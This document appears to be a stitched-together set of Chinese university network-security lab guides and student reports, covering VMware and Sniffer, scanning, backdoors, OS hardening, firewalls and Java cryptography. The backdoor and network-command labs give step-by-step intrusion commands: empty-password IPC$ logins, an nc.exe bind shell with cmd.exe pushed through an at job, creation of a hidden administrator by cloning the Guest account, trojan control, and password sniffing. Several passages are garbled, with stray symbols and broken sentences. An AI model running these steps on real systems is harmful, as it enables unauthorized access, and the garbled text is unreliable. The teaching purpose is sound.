网络安全实验指导

网络安全实验指导
网络安全实验指导

目录

项目一 Vmware虚拟机及sniffer抓包软件的使用项目二网络基本命令的使用

项目三扫描和网络监听

项目四后门和木马

项目五操作系统安全配置方案

项目六防火墙技术

项目一 Vmware虚拟机及sniffer抓包软件的使用

一实验目的

1、学会安装和使用vmware软件并能够熟练配置虚拟机。

2、学会使用sniffer软件抓取数据包。

二实验设备

1、配置有vmware软件和sniffer软件的电脑多台。

2、局域网环境。

三实验学时

4学时

四实验内容

1、安装vmware虚拟机。

2、配置vmware虚拟机。

1)在虚拟机中装操作系统,选择菜单栏“File”下的“New”菜单项,再选

择子菜单“New Virtual Machine”。

2)有两种选择,选项“Typical”是典型安装,选项“Custom”是自定义安装,我

们选择“Custom”安装方式。点击按钮“下一步”。3)进入选择操作系统界面,设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.

Used Bridged networking”,点击“下一步”。Create a new virtual disk,点击下一步。

7)选择虚拟磁盘所要安装的目录,最后完成。

3、测试vmware虚拟机和局域网中其他电脑的连通性。

1)设置虚拟机的ip(和主机ip在同一网段)。

2)用ping命令测试虚拟机在局域网的连通性。

4、使用sniffer抓包

1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。选择主菜单Capture下的Define Filter菜单

2)在Address下拉列表中,选择抓包的类型是IP。

3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP和ICMP 选中。

4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode 选项卡,可以看到数据包在两台计算机间的传递过程。

五实验小结

通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。

六注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目二网络基本命令的使用

一实验目的

1、理解并熟练掌握网络攻击和防御中常见的DOS命令。

2、掌握IPC$技术的攻击及防御的常用方法。

二实验设备

1、连接到局域网的计算机多台。

2、使用软件:shutdown.exe(远程关机程序);nc.exe(“瑞士军刀”程序)。

三实验学时

4学时

四实验内容

1、利用DOS命令实现远程关机:

1)拷贝工具shutdown.exe到本机目录c:\winnt\system32下。

2)输入命令:ping 目标机ip,测试和目标机的是否连通。

3)用net命令进行远程连接:

net use \\目标机ip\ipc$“password”/user:”username”(局域网内计算机用户id为:administrator,用户password为空).

4)输入远程重启计算机指令:

shutdown -r -m \\目标机ip(命令:shutdown /?查询shutdown的使用方法)

2、利用nc.exe在远程电脑开启telnet服务:

1)利用net命令同远程电脑建立连接,方法同上。

2)使用copy命令将nc.exe拷贝到远程电脑的C:\winnt\system32目录下:

●net use \\目标机ip\ipc$“password” /user:”username”

●copy \本机路径\nc.exe \\目标机ip\admin$\system32

3)利用at命令远程执行程序nc.exe开启telnet服务。

at \\目标机IP time nc -l -p 99(指定端口) -t -e cmd.exe(命令:nc –h查询nc程序的使用方法)

4)利用目标机99端口telnet登陆远程电脑:

telnet 目标机ip 99

3、在远程电脑上新建文件。

4、在远程计算机上创建自己的管理员用户:

1)net user username /add

2)net localgroup administrators username /add

5、查看当前系统中的用户确认添加用户操作是否成功:

net user

6、删除本机ipc$共享:

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete…

7、查看端口操作:

使用命令netstat –an查看本机端口。

五实验小结

通过本次实验同学们熟练掌握一些常用的网络命令,进一步理解了ipc$技术的漏洞和防御方法。

六注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目三扫描和网络监听

一、实验目的

掌握网络监听的工作机制和作用,学习常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用。

二、实验设备

1、连接到局域网的计算机多台

2、扫描和监听程序,如PortScan、WinSniffer和X-scan等。

三、实验学时

4学时

四、实验内容

实验需要两台计算机,可在主机的vmware中安装Windows2000Server来代替另一台计算机,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。

1、在主机的vmware中安装Windows2000Server,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。

2、使用扫描和网络监听程序对安装Windows2000Server的服务器进行监听并实现入侵。

1)使用PortScan对Windows2000Server的服务器进行端口扫描,在“Scan”文本框中输入IP地址,单击按钮“START”,开始扫描。

2)使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。在“指定IP范围”中输入对方IP,并在“扫描模块”设置想要扫描的参数,设置完成后,点击“开始扫描”。

3)使用网络监听WinSniffer截取局域网内的密码。安装并打开WinSniffer,单击工具栏图标“Adapter”,设置网卡为本机物理网卡“Realtek RTL8139(A)”,单击“start”开始监听。使用DOS命令行连接远程的FTP服务,抓取密码。

五、实验总结

本次实验使学生掌握常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用方法。

六注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目四后门和木马

一实验目的

区分木马和后门,掌握常用的后门设置方法,掌握木马冰河的使用、掌握如何设置网络代理跳板。

二实验设备

1、连接到局域网的计算机多台

2、使用工具:RTCS.vbe、psu.exe、pulist.exe、djxyxs.exe、冰河V8.2、sksockserver.exe、SkServerGUI.exe、sc32r231.exe

三实验学时

4学时

四实验内容

1、利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。命令的语法是:

“cscript RTCS.vbe 172.18.25.109 administrator 123456 1 23”。

2、利用工具软件psu.exe得到注册表键值的查看和编辑权。将psu.exe拷贝对方主机的C盘下,并在任务管理器查看对方主机winlogon.exe进程的ID号或者使用pulist.exe文件查看该进程的ID号,执行命令:

“psu -p regedit -i pid”其中pid为Winlogon.exe的进程号。在打开的注册表编辑器中将Guest(0x1f5)中的键值用Administrator(0x1f4)中的键值覆盖。在注册表中将Guest和0x1f5导出,删除,再重新导入。然后执行:

“net user guest (新密码)--修改guest帐户密码

net user guest /active:yes --开启guest帐户

net user guest /active:no --停止guest帐户

”OK!

3、将djxyxs.exe文件上传并拷贝到对方服务器的Winnt\temp目录下,执行,解压后执行解压出来的azzd.exe文件。该文件使服务器自动重启,使用终端服务连接软件(如mstsc.exe)登陆服务器。

4、使用“冰河”进行远程控制

win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器。

5、首先将本地计算机设置为一级代理,将文件拷贝到C盘根目录下,然后将代理服务工具sksockserver.exe安装到主机上。执行步骤为:执行“sksockserver -install”将代理服务安装主机中,执行“sksockserver -config port 1122”将代理服务的端口设置为1122,当然可以设置为其他的数值,执行“sksockserver -config starttype 2”将该服务的启动方式设置为自动启动,执行“net start skserver”启动代理服务。

在网络上其他的主机上设置二级代理,使用本地代理配置工具:

SkServerGUI.exe,在主菜单“配置”下的菜单项“经过的SKServer”设置参数。

安装sc32r231.exe,安装汉化HBC-SC32231-Ronnier.exe,然后执行该程序。五实验总结

通过本次实验使学生能够区分木马和后门,掌握远程开启对方的Telnet服、让禁用的Guest具有管理权限的方法、连接到终端服务的方法,并考虑其防御方法,掌握如何设置网络代理跳板。

六注意事项

实验软件有一定的破坏性,有可能影响实验用计算机的正常运行。

项目五操作系统安全配置方案

一实验目的

1、掌握操作系统安全配置。

2、掌握操作系统的安全策略配置。

3、掌握操作系统安全信息通信配置。

二实验设备

1、Windows2000操作系统。

2、局域网环境。

三实验学时

4学时

四实验内容

1、操作系统安全配置:

停止Guest帐号、限制用户数量、创建多个管理员帐号、管理员帐号改名、设置陷阱帐号、更改默认权限、管理员帐号设置安全密码、设置屏幕保护密码。

2、操作系统的安全策略配置:

关闭不必要的服务、关闭不必要的端口、开启审核策略、开启密码策略、开启帐户策略、备份敏感文件、不显示上次登陆名、禁止建立空连接、下载最新的补丁。

3、操作系统安全信息通信配置:

关闭DirectDraw、关闭默认共享、禁用Dump File、熟悉文件加密系统、加密Temp文件夹、锁住注册表、关机时清除文件、禁止软盘光盘启动、禁止判断主机类型、抵抗DDOS、禁止Guest访问日志、使用数据恢复软件恢复已丢失的数据。

五实验小结

通过本次实验,能够基本掌握操作系统的初级、中级和高级配置。

六注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

项目六防火墙技术

一实验目的

1、用WinRoute创建包过滤规则

2、用WinRoute禁用FTP访问

3、用WinRoute禁用HTTP访问

4、掌握入侵检测工具:BlackICE、冰之眼

二实验设备

1、Windows操作系统。

2、WinRoute、BlackICE、冰之眼。

三实验学时

4学时

四实验内容

1、安装WinRoute

以管理员身份安装该软件,安装完毕后,启动“WinRoute Administration”。默认情况下,该密码为空。点击按钮“OK”,进入系统管理。当系统安装完毕以后,该主机就将不能上网,需要修改默认设置,点击工具栏图标,出现本地网络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中。

2、用WinRoute创建包过滤规则

1)选择菜单项“Packet Filter”,选中网卡图标,单击按钮“添加”。出现过滤规则添加对话框,所有的过滤规则都在此处添加。

2)在协议下拉列表中选择“ICMP”,在“ICMP Type”栏目中,将复选框全部选中。在“Action”栏目中,选择单选框“Drop”。在“Log Packet”栏目中选中“Log into Window”,创建完毕后点击按钮“OK”,一条规则就创建完毕。

3)为了使设置的规则生效,点击按钮“使用”。

4)设置完毕,使用指令“Ping”来探测主机,将收不到回应,虽然主机没有响应,但是已经将事件记录到安全日志了。选择菜单栏“View”下的菜单项“Logs>Security Logs”,察看日志纪录。

3、用WinRoute禁用FTP访问

FTP服务用TCP协议,FTP占用TCP的21端口,主机的IP地址是“目的组序号动作源IP 目的IP 源端口目的端口协议类型

1 禁止* “目的IP”* 21 TCP

设置访问规则以后,再访问主机“172.18.25.109”的FTP服务,将遭到拒绝访问违反了访问规则,会在主机的安全日志中记录下来。

4、用WinRoute禁用HTTP访问

HTTP服务用TCP协议,占用TCP协议的80端口,主机的IP地址是“目组序号动作源IP 目的IP 源端口目的端口协议类型

1 禁止* “目的IP”* 80 TCP

打开本地的IE连接远程主机的HTTP服务,将遭到拒绝,访问违反了访问规则,所以在主机的安全日志中记录下来。

5、入侵检测工具:BlackICE。

6、入侵检测工具:冰之眼

五实验小结

学会使用WinRoute创建包过滤规则、禁用FTP访问、HTTP访问,掌握入侵检测工具:BlackICE、冰之眼。

六注意事项

实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。

网络安全技术实验报告

中南林业科技大学 实验报告 课程名称:计算机网络安全技术 专业班级:2014 级计算机科学与技术 2班 姓名:孙晓阳 / 学号:

( 目录 实验一java 安全机制和数字证书的管理 (5) 一实验名称 (5) 二实验目的 (5) 三实验内容 (5) 四实验结果和分析 (6) , 命令输入 (6) 分析 (7) 五小结 (8) 实验二对称密码加密算法的实现 (10) 一实验名称 (10) 二实验目的 (10) 三实验内容 (10) ? 四实验结果和分析 (10) 说明 (10) 实验代码 (10) 实验结果 (13) 五小结 (13) 实验三非对称密钥 (14) 一实验名称 (14) { 二实验目的 (14) 三实验内容 (14) 四实验结果和分析 (14)

实验代码 (14) 实验结果 (15) 五小结 (16) 实验四数字签名的实现 (17) — 一实验名称 (17) 二实验目的 (17) 三实验内容 (17) 四实验结果和分析 (17) 实验代码 (17) 实验结果 (19) 五小结 (19) ? 总结 (19)

实验一java 安全机制和数字证书的管理》 一实验名称 java 安全机制和数字证书的管理 二实验目的 了解 java 的安全机制的架构和相关的知识; 利用 java 环境掌握数字证书的管理 三实验内容 java 安全机制(JVM,沙袋,安全验证码)。 & java 的安全机制的架构 加密体系结构(JCA,Java Cryptography Architecture) 构 成 JCA 的类和接口: :定义即插即用服务提供者实现功能扩充的框架与加解密功能调用 API 的核心类和接口组。 一组证书管理类和接口。 一组封装 DSA 与 RSA 的公开和私有密钥的接口。 描述公开和私有密钥算法与参数指定的类和接口。用 JCA 提供的基本加密功能接口可以开发实现含消息摘要、数字签名、密钥生成、密钥转换、密钥库管理、证书管理和使用等功能的应用程序。 加密扩展(JCE,Java Cryptography Extension) 构 成 JCE 的类和接口: :提供对基本的标准加密算法的实现,包括 DEs,三重 DEs(Triple DEs),基于口令(PasswordBasedEncryptionstandard)的 DES,Blowfish。 ( 支持 Diffie 一 Hell-man 密钥。定义密钥规范与算法参数规范。 安全套接扩展(JSSE,Java Secure Socket1 Extension)JSSE 提供了实现 SSL 通信的标准 Java API。 JSSE 结构包括下列包: .包含 JSSE API 的一组核心类和接口。

网络安全实验报告

网络安全实验报告 务书 一、目的与要求根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上,能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各类安全问题,维护网络及操作系统的安全。 二、主要内容实验一加密认证通信系统实现设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语言不限,可以直接调用现有模块,认证和加密不限)实验二 综合扫描及安全评估利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从而提高系统的安全性能。实验三 网络攻防技术矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地解决各种威胁。实验四 Windows系统安全配置方案作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往忽视了OS的安

全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵检测软件来加强系统的安全。其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房的网络信息安全综合实验系统上完成。 三、进度计划序号设计(实验)内容完成时间备注1接受任务,查阅文献,开始实现密码算法和认证算法第一天2完成加密认证通信系统第二至七天3上午完成综合扫描及安全评估实验,下午进行网络攻防实验第八天4上午完成网络攻防实验,下午进行系统安全配置实验第九天5撰写实验报告并验收第天 四、实验成果要求 1、要求程序能正常运行,并实现任务书要求功能。 2、完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重对设计思路的归纳和对问题解决过程的总结。 五、考核方式平时成绩+程序验收+实验报告。 学生姓名: 指导教师:xx 年6 月13 日实验报告题目: 网络信息安全综合实验院系: 计算机系班级:

2020(安全生产)2020年网络安全实验指导书

《网络安全》实训指导

目录 实验一ARP模拟攻击测试与流量分析 (1) 实验二利用PGP实施非对称加密 (16) 实验三利用数字证书保护通信 (28) 实验四利用隧道技术连接企业与分支 (38) 实验五基于路由器实现VPN连接 (45) 实验六基本防火墙功能配置 (61) 实验七软件防火墙配置保护主机与内部网络 (79) 实验八基于Session wall入侵检测功能配置 (92) 实验九基于Snort入侵检测功能配置 (105) 实验十网络管理技术的SNMP实现 (120)

实验一ARP模拟攻击测试与流量分析 实验目的: 1、在不影响网络安全可靠运行的前提下,对网络中不同类型的协议数据进行捕获; 2、能对捕获到的不同类型协议数据进行准确的分析判断,发现异常; 3、快速有效地定位网络中的故障原因,在不投入新的设备情况下解决问题; 4、熟悉协议封装格式及原理,明确网络协议本身是不安全的。 实验要求: 1、复习网络层次及协议对应关系,协议封装,重点对ARP协议数据结构进行分析; 2、工具及软件选用:安装Sniffer Pro软件、捕获前的设置; 3、捕获ARP协议数据,并进行分析; 4、明确ARP协议的缺陷,制定模拟ARP攻击方法; 5、实施ARP协议模拟攻击与攻击结果检查; 6、确定ARP攻击流量并加以分析; 7、针对此类攻击的防范。 实验工具与软件: 1、协议分析软件Sniffer pro; 2、ARP攻击器; 3、在实际工作中建议使用笔记本电脑配置一条直通双绞线和一条交换机配置线。实验原理: 在以太网同一网段内部,当一个基于TCP/IP的应用程序需要从一台主机发送数据给另一台主机时,它把信息分割并封装成包,附上目的主机的IP地址。然后,寻找IP 地址到实际MAC地址的映射,这需要发送ARP广播消息。当ARP找到了目的主机

天融信攻防演练平台及安全实验室建设的解决方案-通用-20130421.docx

天融信攻防演练平台&安全实验室建设方案 北京天融信科技有限公司 2013-04-19

目录 第1章综述 (4) 第2章实验室需求分析 (5) 2.1人才需求 (5) 2.2攻防需求 (5) 2.3研究需求 (5) 第3章实验室概述 (6) 3.1实验室网络结构 (6) 3.2实验室典型配置 (6) 第4章攻防演练系统系统介绍 (8) 4.1攻防演练系统系统概述 (8) 4.2攻防演练系统系统体系 (9) 第5章信息安全演练平台介绍 (10) 5.1应急响应流程 (10) 5.2演练事件 (11) 5.3.1信息篡改事件 (11) 5.3.2拒绝服务 (13) 5.3.3DNS劫持 (14) 5.3.4恶意代码 (15) 第6章信息安全研究实验室介绍 (18) 6.1渗透平台 (18) 6.2靶机平台 (19) 6.3监控平台 (20) 第7章方案优势和特点 (22) 7.1实验室优势 (22) 7.2实验室特点 (23) 7.3安全研究能力 (23) 7.4培训服务及认证 (24)

第8章电子政务网站检测案例.................................................................................... 错误!未定义书签。第9章实验室建设建议.. (26) 9.1实验室建设步骤 (26) 9.2实验室设备清单 (27)

第1章综述 为满足电信、军工、航天、网监、教育等行业对信息安全人才培养、攻防演练、安全研究等需求,北京天融信科技有限公司基于虚拟化技术开发了安全实训系统,并以此系统为核心打造了信息安全实验室。以下是系统主要特点: ?通过虚拟化模板快速模拟真实系统环境 通过融合虚拟网络和真实物理网络,简单拖拽即可快速搭建模拟业务系统环境,并在拓扑及配置出现问题时,方便快速恢复。 ?通过监控平台可实时观察测试情况 可通过实训系统监控平台、在线或远程的方式对所模拟的网络测试环境进行监控。 ?多种虚拟化主机和网络模板 ?网络拓扑所见即所得拖拽模式 ?和真实的网络可互通 ?整体测试环境可快速恢复 ?监控主机服务、进程及资源状态 ?监控网络协议 ?定义和捕获攻击行为 ?针对攻击行为报警

22【网络安全】【基础】【实现无线用户的二层隔离】

实现无线用户的二层隔离 【实验名称】 实现无线用户的二层隔离 【实验目的】 掌握配置无线网络用户的二层隔离的方法 【背景描述】 小张是学校的网络管理员,最近他发现学校内前期建成的无线网络内经常有学生反应当地的无线网络的速度非常慢,然后小张就在网管上查看,发现无线网络内的流量很大,而学校出口的流量不是很大,据此小张推断是有学生在利用无线网络相互之间传输大量的数据。为了增加无线网络的利用率,减少无线网络带宽在局域网内的浪费,小张决定把无线网络内的用户做个二层隔离。 【需求分析】 需求1:如何降低无线局域网内无线带宽的浪费。 分析1:用智能无线局域网的二层隔离功能将用户隔离开,不允许无线网用户使用无线网络互相访问和传输数据。 【实验拓扑】 AP 【实验设备】 RG-WG54U 2块 PC 2台 智能无线AP 1台 智能无线交换机1台 【预备知识】 无线局域网基本知识 智能无线交换网络网管RingMaster基本操作 325

【实验原理】 智能型无线交换网络的无线交换机由于有了一般交换机VLAN的强大功能,所以,对于二层隔离也可以实现,从而隔离无线网络用户的相互访问。 【实验步骤】 第一步:配置无线交换机的基本参数 无线交换机的默认IP地址是192.168.100.1/24,因此将STA-1的IP地址配置为192.168.100.2/24,并打开浏览器登陆到https://192.168.100.1,弹出以下界面:选择“Y”。 系统的默认管理用户名是admin,密码为空。 输入用户名和密码后就进入了无线交换机的web配置页面,点击“start”,进入快速配置指南。 326

网络安全实验报告

网络安全实验报告 姓名:杨瑞春 班级:自动化86 学号:08045009

实验一:网络命令操作与网络协议分析 一.实验目的: 1.熟悉网络基本命令的操作与功能。 2.熟练使用网络协议分析软件ethereal分析应用协议。 二.实验步骤: 1. 2.协议分析软件:ethereal的主要功能:设置流量过滤条件,分析网络数据包, 流重组功能,协议分析。 三.实验任务: 1.跟踪某一网站如google的路由路径 2.查看本机的MAC地址,ip地址 输入ipconfig /all 找见本地连接. Description . . .. . : SiS 900-Based PCI Fast Ethernet Adapte Physical Address.. . : 00-13-8F-07-3A-57 DHCP Enabled. . .. . : No IP Address. . . .. . : 192.168.1.5

Subnet Mask . . .. . : 255.255.255.0 Default Gateway .. . : 192.168.1.1 DNS Servers . . .. . : 61.128.128.67 192.168.1.1 Default Gateway .. . : 192.168.1.1 这项是网关.也就是路由器IP Physical Address.. . : 00-13-8F-07-3A-57 这项就是MAC地址了.

3.telnet到linux服务器,执行指定的命令

5.nc应用:telnet,绑定程序(cmd,shell等),扫描,连接等。

《网络安全技术》实验指导书

《网络安全技术》实验指导书 专业:电子商务 姓名:王彤彤 学号:2011091383 山东建筑大学商学院 电子商务教研室

目录 实验一系统安全设置 (3) 实验二DES加解密算法的实现 (5) 实验三网络攻防工具使用 (6) 实验四PGP实现邮件加密和签名 (7) 实验五配置支持SSL协议的安全网站 (9) 实验六防火墙配置 (17) 实验七VPN (18)

实验一系统安全设置 一、实验目的及任务: 掌握对Window200系统进行安全设置的过程。 二、实验环境 主机操作系统为Windows2000或Windows XP; 三、预备知识 要深入理解操作系统安全的定义,具备一定的操作系统设置技能。 四、实验步骤 系统登陆用户账号保护设置、关闭不必要的服务和端口、开启各项安全策略。 1、停止Guest账号 在计算机管理的用户里面把Guest账号禁用。为了保险起见,最好给Guest加一个复杂的密码。你可以打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷进去。 2、限制用户数量 去掉所有的Duplicate User用户、测试用户、共享用户等等。用户组策略设置相应权限,并且经常检查系统的用户,删除已经不再使用的用户。这些用户很多时候都是黑客们入侵系统的突破口。 3、多个管理员账号、管理员账号改名 创建一个一般权限用户用来收信以及处理一些日常事物,另一个拥有Administrators 权限的用户只在需要的时候使用。将Administrator管理员用户名更改为一个一般的用户名。 4、陷阱账号 创建一个名为“Administrator”的本地用户,把它的权限设置成最低,什么事也干不了的那种,并且加上一个超过10位的超级复杂密码。。 5、更改默认权限 任何时候都不要把共享文件的用户设置成“Everyone”组,包括打印共享,默认的属性就是“Everyone”组的,一定不要忘了改。 6、安全密码、屏幕保护密码 设置足够强度的管理员密码,并定期更改安全密码。 在桌面上单击右键,“属性”,“屏幕保护程序”,选择屏幕保护程序,并点击“设置”按钮设置屏保时间和密码。 7、开启操作系统安全策略—审核策略、密码策略、账户策略 使用用户策略,分别设置复位用户锁定计数器时间为20分钟,用户锁定时间为20分钟,用户锁定阈值为3次;注意应用密码策略,如启用密码复杂性要求,设置密码长度最小值为6位,设置强制密码历史为5次,时间为42天。 8、关闭不必要的服务、端口 关闭端口意味着减少功能,在安全和功能上面需要你做一点决策。如果

网络安全实验报告

信息与科学技术学院学生上机实验报告 课程名称:计算机网络安全 开课学期:2015——2016学年 开课班级:2013级网络工程(2)班 教师姓名:孙老师 学生姓名:罗志祥 学生学号:37 实验一、信息收集及扫描工具的使用 【实验目的】 1、掌握利用注册信息和基本命令实现信息收集 2、掌握结构探测的基本方法 3、掌握X-SCAN的使用方法 【实验步骤】 一、获取以及的基本信息 1.利用ping 和nslookup获取IP地址(得到服务器的名称及地址) 2.利用来获取信息 二、使用工具获取到达的结构信息 三、获取局域网内主机IP的资源信息 -a IP 获得主机名;

-a IP 获得所在域以及其他信息; view IP 获得共享资源; a IP 获得所在域以及其他信息; 四、使用X-SCAN扫描局域网内主机IP; 1.设置扫描参数的地址范围; 2.在扫描模块中设置要扫描的项目; 3.设置并发扫描参数; 4.扫描跳过没有响应的主机; 5.设置要扫描的端口级检测端口; 6.开始扫描并查看扫描报告; 实验二、IPC$入侵的防护 【实验目的】 ?掌握IPC$连接的防护手段 ?了解利用IPC$连接进行远程文件操作的方法 ?了解利用IPC$连接入侵主机的方法 【实验步骤】 一:IPC$ 连接的建立与断开 通过IPC$ 连接远程主机的条件是已获得目标主机管理员的账号和密码。 1.单击“开始”-----“运行”,在“运行”对话框中输入“cmd”

1.建立IPC$连接,键入命令 net use 123 / user:administrator 2.映射网络驱动器,使用命令: net use y: 1.映射成功后,打开“我的电脑”,会发现多了一个y盘,该磁盘即为目标主机的C盘 1.在该磁盘中的操作就像对本地磁盘操作一 1.断开连接,键入 net use * /del 命令,断开所有的连接 1.通过命令 net use 可以删除指定目标IP 的IPC$ 连接。 ?建立后门账号 1.编写BAT文件,内容与文件名如下,格式改为:.bat 1.与目标主机建立IPC$连接 2.复制文件到目标主机。(或映射驱动器后直接将放入目标主机的C 盘中) 1.通过计划任务使远程主机执行文件,键入命令:net time ,查看目标主机的时间。 1.如图,目标主机的系统时间为13:4513:52 c:\ ,然后断开IPC$连接。 1.验证账号是否成功建立。等一段时间后,估计远程主机已经执行了文件,通过建立IPC$连接来验证是否成功建立“sysback”账号:建立IPC$连接,键入命令 net use 123 /user:sysback 1.若连接成功,说明管理员账号“sysback”已经成功建立连接。

网络安全课程实验指导书

网络安全课程实验安排及指导书 2009-10-21

实验安排1、推荐必做实验 网络扫描 计算机病毒及恶意代码 防火墙实验 入侵检测系统 2、推荐选作实验 VPN配置 证书的申请和使用 windows安全配置实验

实验一:网络扫描实验 【实验目的】 了解扫描的基本原理,掌握基本方法,最终巩固主机安全 【实验内容】 1、学习使用Nmap的使用方法 2、学习使用漏洞扫描工具 【实验环境】 1、硬件PC机一台。 2、系统配置:操作系统windows XP以上。 【实验步骤】 1、端口扫描 1)解压并安装ipscan15.zip,扫描本局域网内的主机 2)解压nmap-4.00-win32.zip,安装WinPcap 运行cmd.exe,熟悉nmap命令(详见“Nmap详解.mht”)。 3)试图做以下扫描: 扫描局域网内存活主机, 扫描某一台主机或某一个网段的开放端口 扫描目标主机的操作系统 试图使用Nmap的其他扫描方式,伪源地址、隐蔽扫描等 2、漏洞扫描 解压X-Scan-v3.3-cn.rar,运行程序xscan_gui.exe,将所有模块选择扫描,扫描本机,或局域网内某一台主机的漏洞 【实验报告】 1、说明程序设计原理。 2、提交运行测试结果。 【实验背景知识】 1、扫描及漏洞扫描原理见第四章黑客攻击技术.ppt 2、NMAP使用方法 扫描器是帮助你了解自己系统的绝佳助手。象Windows 2K/XP这样复杂的操作系统支持应用软件打开数百个端口与其他客户程序或服务器通信,端口扫描是检测服务器上运行了哪些服务和应用、向Internet或其他网络开放了哪些联系通道的一种办法,不仅速度快,而且效果也很不错。 Nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP,TCP connect(),TCP SYN (half open), ftp proxy (bounce attack),Reverse-ident, ICMP (ping sweep), FIN, ACK sweep,X mas Tree, SYN sweep, 和Null扫描。你可以从SCAN TYPES一节中察看相关细节。nmap 还提供一些实用功能如通过tcp/ip来甄别操作系统类型、秘密扫描、动态延迟和重发、平行扫描、通过并行的PING侦测下属的主机、欺骗扫描、端口过滤探测、直接的RPC扫描、分布扫描、灵活的目标选择以及端口的描述。 一、安装Nmap Nmap要用到一个称为“Windows包捕获库”的驱动程序WinPcap——如果你经常从网上下载流媒体电影,可能已经熟悉这个驱动程序——某些流媒体电影的地址是加密的,侦测这些电影的真实地址就要用到WinPcap。WinPcap的作用是帮助调用程序(即这

网络安全实验室方案书上课讲义

网络安全实验室方案 书

网络安全实验室方案书 一、认证课程与学校网络安全实验室建立的关系: 学校建立网络安全实验室的同时,即可引进TCSE课程,实验室与网络安全相关课程紧密结合,构建完善的网络安全教学体系。 趋势科技网络安全实验室参照学校网络专业的建设要求,结合学校认同的趋势科技TCSP-TCSE认证课程体系的专业教学要求,严格把关,层层审核,使用我们公司的最新硬件设备及软件产品来搭建而成。认证课程方案授权范围内包含我们的专业实验设备(具体产品可根据实际需要调节)。 若学校有一定的网络安全实验室建设需要,完整的趋势科技实验室设备随时恭候您的选购,并在专业领域权威性的技术带领下,提供学校一套完善而优秀的实验课程认证体系,附赠免费的全套技术支持。倘若学校有其他实验室教学要求没有采纳我们整体TCSP-TCSER 认证课程体系,也可以单独采购部分硬件设备。 二、搭建网络实验室的重要性 1、实际的动手操作能力 随着就业竞争力的不断加大,各高校不断加强学生的专业知识训练。对于计算机专业的学生,他们更需要“强理论知识+动手实践”的训练方式,单一的理论知识已不足已他们在职场上占据竞争优势。现在有的培训机构由于没有整体的教学实验环境或实验设备不足,学生毕业后匆匆来到相关企业实习,发现“信息系统”早已演变为企业的命脉,这时他们正想投身回报社会,不巧被高级网管叫“停”,由于信息的安全性和敏感性,网络系统通常有层层密码保护,不仅企业内部的一般网管无法进入运行中的重要系统,外来实习人员更无法接触到运行中的关键设备和整个网络系统的核心技术。正常运行中的网络系统不可能让实习生当成训练场,结局自然就只能远远看着机房……为了扭转这种局势,高校必须配备同比企业的项目和工程的实验环境,使学生有充分动手的机会,占据就业竞争优势。

网络安全实验心得

网络安全实验心得 一实验名称 系统主机加固 二实验目的 熟悉windows操作系统的漏洞扫描工具 了解Linux操作系统的安全操作三实验步骤 Windows主机加固 一.漏洞扫描及测试 2.漏洞测试 (1)主机A建立ipc$空连接 net use \\100.10.1.2\ipc$“” /user:”” (2)主机A通过NetBIOS获得主机B信息 主机A在命令行下执行如下命令:nbtstat –A 100.10.1.2 获得主机B的信息包括:主机名:HOST7D MAC地址:00-0C-29-31-8D-8F (3)主机A通过telnet远程登录主机B 主机A在命令行下执行如下命令:telnet 100.10.1.2 输入“n”|“Enter”,利用扫描到的弱口令用户,登录主机B。 在主机B的D盘下新建名称为“jlcss”的文件夹,命令为d: 和mkdir jlcss 主机B查看D盘出现了名为“jlcss”的文件夹,文件夹创建时间为2016-5-16 9:30 (4)主机A通过ftp访问主机B 主机A打开IE浏览器,在地址栏中输入“ftp://主机B的IP地址”,可以访问二.安全加固实施 1.分析检测报告 2.关闭ipc$空连接 主机A建立ipc$空连接,命令如下:net use \\100.10.1.2\ipc$“” /user:”” 出现提示:命令成功完成

